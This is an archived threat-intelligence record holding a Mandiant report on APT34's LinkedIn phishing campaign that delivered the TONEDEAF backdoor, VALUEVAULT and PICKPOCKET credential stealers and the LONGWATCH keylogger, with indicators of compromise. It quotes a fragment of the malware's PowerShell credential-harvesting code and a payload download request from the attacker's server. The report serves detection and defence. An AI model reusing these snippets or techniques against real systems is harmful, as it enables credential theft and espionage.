{ "id": "07787551-db33-4524-bb5c-70b0d1391ccf", "created_at": "2026-04-06T00:06:42.009174Z", "updated_at": "2026-04-10T03:37:36.749269Z", "deleted_at": null, "sha1_hash": "087594b78ccbc96e0915734d908332cb6dfec04f", "title": "Hard Pass: Declining APT34's Invite to Join Their Professional Network | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 806442, "plain_text": "Hard Pass: Declining APT34's Invite to Join Their Professional\r\nNetwork | Mandiant\r\nBy Mandiant\r\nPublished: 2019-07-18 · Archived: 2026-04-05 19:56:47 UTC\r\nWritten by: Matt Bromiley, Noah Klapprodt, Nick Schroeder, Jessica Rocchio\r\nBackground\r\nWith increasing geopolitical tensions in the Middle East, we expect Iran to significantly increase the volume and\r\nscope of its cyber espionage campaigns. Iran has a critical need for strategic intelligence and is likely to fill this\r\ngap by conducting espionage against decision makers and key organizations that may have information that\r\nfurthers Iran's economic and national security goals. The identification of new malware and the creation of\r\nadditional infrastructure to enable such campaigns highlights the increased tempo of these operations in support of\r\nIranian interests.\r\nFireEye Identifies Phishing Campaign\r\nIn late June 2019, FireEye identified a phishing campaign conducted by APT34, an Iranian-nexus threat actor.\r\nThree key attributes caught our eye with this particular campaign:\r\n1. Masquerading as a member of Cambridge University to gain victims’ trust to open malicious documents,\r\n2. The usage of LinkedIn to deliver malicious documents,\r\n3. The addition of three new malware families to APT34’s arsenal.\r\nFireEye’s platform successfully thwarted this attempted intrusion, stopping a new malware variant dead in its\r\ntracks. Additionally, with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE),\r\nIntelligence, and Advanced Practices teams, we identified three new malware families and a reappearance of\r\nPICKPOCKET, malware exclusively observed in use by APT34. The new malware families, which we will\r\nexamine later in this post, show APT34 relying on their PowerShell development capabilities, as well as trying\r\ntheir hand at Golang.\r\nAPT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014. They use a mix\r\nof public and non-public tools to collect strategic information that would benefit nation-state interests pertaining\r\nto geopolitical and economic needs. APT34 aligns with elements of activity reported as OilRig and Greenbug, by\r\nvarious security researchers. This threat group has conducted broad targeting across a variety of industries\r\noperating in the Middle East; however, we believe APT34's strongest interest is gaining access to financial,\r\nenergy, and government entities.\r\nAdditional research on APT34 can be found in this FireEye blog post, this CERT-OPMD post, and this Cisco post.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 1 of 10\n\nMandiant Managed Defense also initiated a Community Protection Event (CPE) titled “Geopolitical Spotlight:\r\nIran.” This CPE was created to ensure our customers are updated with new discoveries, activity and detection\r\nefforts related to this campaign, along with other recent activity from Iranian-nexus threat actors to include\r\nAPT33, which is mentioned in this updated FireEye blog post.\r\nIndustries Targeted\r\nThe activities observed by Managed Defense, and described in this post, were primarily targeting the following\r\nindustries:\r\nEnergy and Utilities\r\nGovernment\r\nOil and Gas\r\nUtilizing Cambridge University to Establish Trust\r\nOn June 19, 2019, Mandiant Managed Defense Security Operations Center received an exploit detection alert on\r\none of our FireEye Endpoint Security appliances. The offending application was identified as Microsoft Excel and\r\nwas stopped immediately by FireEye Endpoint Security’s ExploitGuard engine. ExploitGuard is our behavioral\r\nmonitoring, detection, and prevention capability that monitors application behavior, looking for various anomalies\r\nthat threat actors use to subvert traditional detection mechanisms. Offending applications can subsequently be\r\nsandboxed or terminated, preventing an exploit from reaching its next programmed step.\r\nThe Managed Defense SOC analyzed the alert and identified a malicious file named System.doc (MD5:\r\nb338baa673ac007d7af54075ea69660b), located in C:\\Users\\\\.templates. The file System.doc is a Windows\r\nPortable Executable (PE), despite having a \"doc\" file extension. FireEye identified this new malware family as\r\nTONEDEAF.\r\nA backdoor that communicates with a single command and control (C2) server using HTTP GET and POST\r\nrequests, TONEDEAF supports collecting system information, uploading and downloading of files, and arbitrary\r\nshell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary\r\nfiles – temp.txt and temp2.txt – within the same directory of its execution. We explore additional technical details\r\nof TONEDEAF in the malware appendix of this post.\r\nRetracing the steps preceding exploit detection, FireEye identified that System.doc was dropped by a file named\r\nERFT-Details.xls. Combining endpoint- and network-visibility, we were able to correlate that ERFT-Details.xls\r\noriginated from the URL http://www.cam-research-ac[.]com/Documents/ERFT-Details.xls. Network evidence also\r\nshowed the access of a LinkedIn message directly preceding the spreadsheet download.\r\nManaged Defense reached out to the impacted customer’s security team, who confirmed the file was received via\r\na LinkedIn message. The targeted employee conversed with \"Rebecca Watts\", allegedly employed as \"Research\r\nStaff at University of Cambridge\". The conversation with Ms. Watts, provided in Figure 1, began with the\r\nsolicitation of resumes for potential job opportunities.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 2 of 10\n\nFigure 1: Screenshot of LinkedIn message asking to download TONEDEAF\r\nThis is not the first time we’ve seen APT34 utilize academia and/or job offer conversations in their various\r\ncampaigns. These conversations often take place on social media platforms, which can be an effective delivery\r\nmechanism if a targeted organization is focusing heavily on e-mail defenses to prevent intrusions.\r\nFireEye examined the original file ERFT-Details.xls, which was observed with at least two unique MD5 file\r\nhashes:\r\n96feed478c347d4b95a8224de26a1b2c\r\ncaf418cbf6a9c4e93e79d4714d5d3b87\r\nA snippet of the VBA code, provided in Figure 2, creates System.doc in the target directory from base64-encoded\r\ntext upon opening.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 3 of 10\n\nFigure 2: Screenshot of VBA code from System.doc\r\nThe spreadsheet also creates a scheduled task named \"windows update check\" that runs the file\r\nC:\\Users\\\\.templates\\System Manager.exe every minute. Upon closing the spreadsheet, a final VBA function will\r\nrename System.doc to System Manager.exe. Figure 3 provides a snippet of VBA code that creates the scheduled\r\ntask, clearly obfuscated to avoid simple detection.\r\nFigure 3: Additional VBA code from System.doc\r\nUpon first execution of TONEDEAF, FireEye identified a callback to the C2 server offlineearthquake[.]com over\r\nport 80.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 4 of 10\n\nThe FireEye Footprint: Pivots and Victim Identification\r\nAfter identifying the usage of offlineearthquake[.]com as a potential C2 domain, FireEye’s Intelligence and\r\nAdvanced Practices teams performed a wider search across our global visibility. FireEye’s Advanced Practices and\r\nIntelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim\r\norganizations. Of note, FireEye discovered two additional new malware families hosted at this domain,\r\nVALUEVAULT and LONGWATCH. We also identified a variant of PICKPOCKET, a browser credential-theft\r\ntool FireEye has been tracking since May 2018, hosted on the C2.\r\nRequests to the domain offlineearthquake[.]com could take multiple forms, depending on the malware’s stage of\r\ninstallation and purpose. Additionally, during installation, the malware retrieves the system and current user\r\nnames, which are used to create a three-character “sys_id”. This value is used in subsequent requests, likely to\r\ntrack infected target activity. URLs were observed with the following structures:\r\nhxxp[://]offlineearthquake[.]com/download?id=\u0026n=000\r\nhxxp[://]offlineearthquake[.]com/upload?id=\u0026n=000\r\nhxxp[://]offlineearthquake[.]com/file//?id=\u0026h=000\r\nhxxp[://]offlineearthquake[.]com/file//?id=\u0026n=000\r\nThe first executable identified by FireEye on the C2 was WinNTProgram.exe (MD5:\r\n021a0f57fe09116a43c27e5133a57a0a), identified by FireEye as LONGWATCH. LONGWATCH is a keylogger\r\nthat outputs keystrokes to a log.txt file in the Window’s temp folder. Further information regarding\r\nLONGWATCH is detailed in the Malware Appendix section at the end of the post.\r\nFireEye Network Security appliances also detected the following being retrieved from APT34 infrastructure\r\n(Figure 4).\r\nGET hxxp://offlineearthquake.com/file/\u003csys_id\u003e/b.exe?id=\u003c3char_redacted\u003e\u0026n=000\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0)\r\nAppleWebKit/537.36 (KHTML, like Gecko)\r\nHost: offlineearthquake[.]com\r\nProxy-Connection: Keep-Alive Pragma: no-cache HTTP/1.1\r\nFigure 4: Snippet of HTTP traffic retrieving VALUEVAULT; detected by FireEye Network Security appliance\r\nFireEye identifies b.exe (MD5: 9fff498b78d9498b33e08b892148135f) as VALUEVAULT.\r\nVALUEVAULT is a Golang compiled version of the \"Windows Vault Password Dumper\" browser credential theft\r\ntool from Massimiliano Montoro, the developer of Cain \u0026 Abel.\r\nVALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view\r\nthe credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to\r\nextract browser history in order to match browser passwords with visited sites. Further information regarding\r\nVALUEVAULT can be found in the appendix below.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 5 of 10\n\nFurther pivoting from FireEye appliances and internal data sources yielded two additional files, PE86.dll (MD5:\r\nd8abe843db508048b4d4db748f92a103) and PE64.dll (MD5: 6eca9c2b7cf12c247032aae28419319e). These files\r\nwere analyzed and determined to be 64- and 32-bit variants of the malware PICKPOCKET, respectively.\r\nPICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and\r\nInternet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to\r\ndate, solely utilized by APT34.\r\nConclusion\r\nThe activity described in this blog post presented a well-known Iranian threat actor utilizing their tried-and-true\r\ntechniques to breach targeted organizations. Luckily, with FireEye’s platform in place, our Managed Defense\r\ncustomers were not impacted. Furthermore, upon the blocking of this activity, FireEye was able to expand upon\r\nthe observed indicators to identify a broader campaign, as well as the use of new and old malware.\r\nWe suspect this will not be the last time APT34 brings new tools to the table. Threat actors are often reshaping\r\ntheir TTPs to evade detection mechanisms, especially if the target is highly desired. For these reasons, we\r\nrecommend organizations remain vigilant in their defenses, and remember to view their environment holistically\r\nwhen it comes to information security.\r\nLearn more about Mandiant Managed Defense, and catch an on-demand recap on this and the Top 5 Managed\r\nDefense attacks this year.\r\nMalware Appendix\r\nTONEDEAF\r\nTONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS.\r\nSupported commands include system information collection, file upload, file download, and arbitrary shell\r\ncommand execution. Although this backdoor was coded to be able to communicate with DNS requests to the hard-coded Command and Control server, c[.]cdn-edge-akamai[.]com, it was not configured to use this functionality.\r\nFigure 5 provides a snippet of the assembly CALL instruction of dns_exfil. The creator likely made this as a\r\nmeans for future DNS exfiltration as a plan B.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 6 of 10\n\nFigure 5: Snippet of code from TONEDEAF binary\r\nAside from not being enabled in this sample, the DNS tunneling functionality also contains missing values and\r\nbugs that prevent it from executing properly. One such bug involves determining the length of a command\r\nresponse string without accounting for Unicode strings. As a result, a single command response byte is sent when,\r\nfor example, the malware executes a shell command that returns Unicode output. Additionally, within the\r\nmalware, an unused string contained the address 185[.]15[.]247[.]154.\r\nVALUEVAULT\r\nVALUEVAULT is a Golang compiled version of the “Windows Vault Password Dumper” browser credential theft\r\ntool from Massimiliano Montoro, the developer of Cain \u0026 Abel.\r\nVALUEVAULT maintains the same functionality as the original tool by allowing the operator to extract and view\r\nthe credentials stored in the Windows Vault. Additionally, VALUEVAULT will call Windows PowerShell to\r\nextract browser history in order to match browser passwords with visited sites. A snippet of this function is shown\r\nin Figure 6.\r\npowershell.exe /c \"function get-iehistory {. [CmdletBinding()]. param (). . $shell = New-Object -ComObject Shel\r\nFigure 6: Snippet of PowerShell code from VALUEVAULT to extract browser credentials\r\nUpon execution, VALUEVAULT creates a SQLITE database file in the AppData\\Roaming directory under the\r\ncontext of the user account it was executed by. This file is named fsociety.dat and VALUEVAULT will write the\r\ndumped passwords to this in SQL format. This functionality is not in the original version of the “Windows Vault\r\nPassword Dumper”. Figure 7 shows the SQL format of the fsociety.dat file.\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 7 of 10\n\nFigure 7: SQL format of the VALUEVAULT fsociety.dat SQLite database\r\nVALUEVAULT’s function names are not obfuscated and are directly reviewable in strings analysis. Other\r\ndeveloper environment variables were directly available within the binary as shown below. VALUEVAULT does\r\nnot possess the ability to perform network communication, meaning the operators would need to manually retrieve\r\nthe captured output of the tool.\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/new_edge.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/mozila.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/main.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/ie.go\r\nC:/Users/\u003credacted\u003e/Desktop/projects/go/src/browsers-password-cracker/Chrome Password Recovery.go\r\nFigure 8: Golang files extracted during execution of VALUEVAULT\r\nLONGWATCH\r\nFireEye identified the binary WinNTProgram.exe (MD5:021a0f57fe09116a43c27e5133a57a0a) hosted on the\r\nmalicious domain offlineearthquake[.]com. FireEye identifies this malware as LONGWATCH. The primary\r\nfunction of LONGWATCH is a keylogger that outputs keystrokes to a log.txt file in the Windows temp folder.\r\nInteresting strings identified in the binary are shown in Figure 9.\r\nGetAsyncKeyState\r\n\u003e---------------------------------------------------\\n\\n\r\nc:\\\\windows\\\\temp\\\\log.txt\r\n[ENTER]\r\n[CapsLock]\r\n[CRTL]\r\n[PAGE_UP]\r\n[PAGE_DOWN]\r\n[HOME]\r\n[LEFT]\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 8 of 10\n\n[RIGHT]\r\n[DOWN]\r\n[PRINT]\r\n[PRINT SCREEN] (1 space)\r\n[INSERT]\r\n[SLEEP]\r\n[PAUSE]\r\n\\n---------------CLIPBOARD------------\\n\r\n\\n\\n \u003e\u003e\u003e (2 spaces)\r\nc:\\\\windows\\\\temp\\\\log.txt\r\nFigure 9: Strings identified in a LONGWATCH binary\r\nDetecting the Techniques\r\nFireEye detects this activity across our platforms, including named detection for TONEDEAF, VALUEVAULT,\r\nand LONGWATCH. Table 2 contains several specific detection names that provide an indication of APT34\r\nactivity.\r\nSignature Name\r\nFE_APT_Keylogger_Win_LONGWATCH_1\r\nFE_APT_Keylogger_Win_LONGWATCH_2\r\nFE_APT_Keylogger_Win32_LONGWATCH_1\r\nFE_APT_HackTool_Win_PICKPOCKET_1\r\nFE_APT_Trojan_Win32_VALUEVAULT_1\r\nFE_APT_Backdoor_Win32_TONEDEAF\r\nTONEDEAF BACKDOOR [DNS]\r\nTONEDEAF BACKDOOR [upload]\r\nTONEDEAF BACKDOOR [URI]\r\nTable 1: FireEye Platform Detections\r\nEndpoint Indicators\r\nIndicator MD5 Hash (if applicable) Code Family\r\nSystem.doc b338baa673ac007d7af54075ea69660b TONEDEAF\r\n  50fb09d53c856dcd0782e1470eaeae35 TONEDEAF\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 9 of 10\n\nERFT-Details.xls 96feed478c347d4b95a8224de26a1b2c TONEDEAF DROPPER\r\n  caf418cbf6a9c4e93e79d4714d5d3b87 TONEDEAF DROPPER\r\nb.exe 9fff498b78d9498b33e08b892148135f VALUEVAULT\r\nWindowsNTProgram.exe 021a0f57fe09116a43c27e5133a57a0a LONGWATCH\r\nPE86.dll d8abe843db508048b4d4db748f92a103 PICKPOCKET\r\nPE64.dll 6eca9c2b7cf12c247032aae28419319e PICKPOCKET\r\nTable 2: APT34 Endpoint Indicators from this blog post\r\nNetwork Indicators\r\nhxxp[://]www[.]cam-research-ac[.]com\r\nofflineearthquake[.]com\r\nc[.]cdn-edge-akamai[.]com\r\n185[.]15[.]247[.]154\r\nAcknowledgements\r\nA huge thanks to Delyan Vasilev and Alex Lanstein for their efforts in detecting, analyzing and classifying this\r\nAPT34 campaign. Thanks to Matt Williams, Carlos Garcia and Matt Haigh from the FLARE team for the in-depth\r\nmalware analysis.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nhttps://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "report_names": [ "hard-pass-declining-apt34-invite-to-join-their-professional-network.html" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "a63c994f-d7d6-4850-a881-730635798b90", "created_at": "2025-08-07T02:03:24.788883Z", "updated_at": "2026-04-10T02:00:03.785146Z", "deleted_at": null, "main_name": "COBALT TRINITY", "aliases": [ "APT33 ", "Elfin ", "HOLMIUM ", "MAGNALIUM ", "Peach Sandstorm ", "Refined Kitten ", "TA451 " ], "source_name": "Secureworks:COBALT TRINITY", "tools": [ "AutoCore", "Cadlotcorg", "Dello RAT", "FalseFont", "Imminent Monitor", "KDALogger", "Koadic", "NanoCore", "NetWire", "POWERTON", "PoshC2", "Poylog", "PupyRAT", "Schoolbag" ], "source_id": "Secureworks", "reports": null }, { "id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed", "created_at": "2022-10-25T16:07:23.918534Z", "updated_at": "2026-04-10T02:00:04.789509Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [ "Greenbug", "Volatile Kitten" ], "source_name": "ETDA:Greenbug", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "25896473-161f-411f-b76a-f11bb26c96bd", "created_at": "2023-01-06T13:46:38.75749Z", "updated_at": "2026-04-10T02:00:03.090307Z", "deleted_at": null, "main_name": "CHRYSENE", "aliases": [ "Greenbug" ], "source_name": "MISPGALAXY:CHRYSENE", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e5ff825b-0456-4013-b90a-971b93def74a", "created_at": "2022-10-25T15:50:23.824058Z", "updated_at": "2026-04-10T02:00:05.377261Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "APT33", "HOLMIUM", "Elfin", "Peach Sandstorm" ], "source_name": "MITRE:APT33", "tools": [ "PowerSploit", "AutoIt backdoor", "PoshC2", "Mimikatz", "NanoCore", "DEADWOOD", "StoneDrill", "POWERTON", "LaZagne", "TURNEDUP", "NETWIRE", "Pupy", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", "MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f", "created_at": "2023-01-06T13:46:38.367369Z", "updated_at": "2026-04-10T02:00:02.945356Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "Elfin", "MAGNALLIUM", "HOLMIUM", "COBALT TRINITY", "G0064", "ATK35", "Peach Sandstorm", "TA451", "APT 33", "Refined Kitten" ], "source_name": "MISPGALAXY:APT33", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6bba8e81-73af-4010-86dc-d43c408ca342", "created_at": "2023-01-06T13:46:38.553459Z", "updated_at": "2026-04-10T02:00:03.021597Z", "deleted_at": null, "main_name": "Greenbug", "aliases": [], "source_name": "MISPGALAXY:Greenbug", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-10T02:00:04.788408Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434002, "ts_updated_at": 1775792256, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/087594b78ccbc96e0915734d908332cb6dfec04f.pdf", "text": "https://archive.orkl.eu/087594b78ccbc96e0915734d908332cb6dfec04f.txt", "img": "https://archive.orkl.eu/087594b78ccbc96e0915734d908332cb6dfec04f.jpg" } }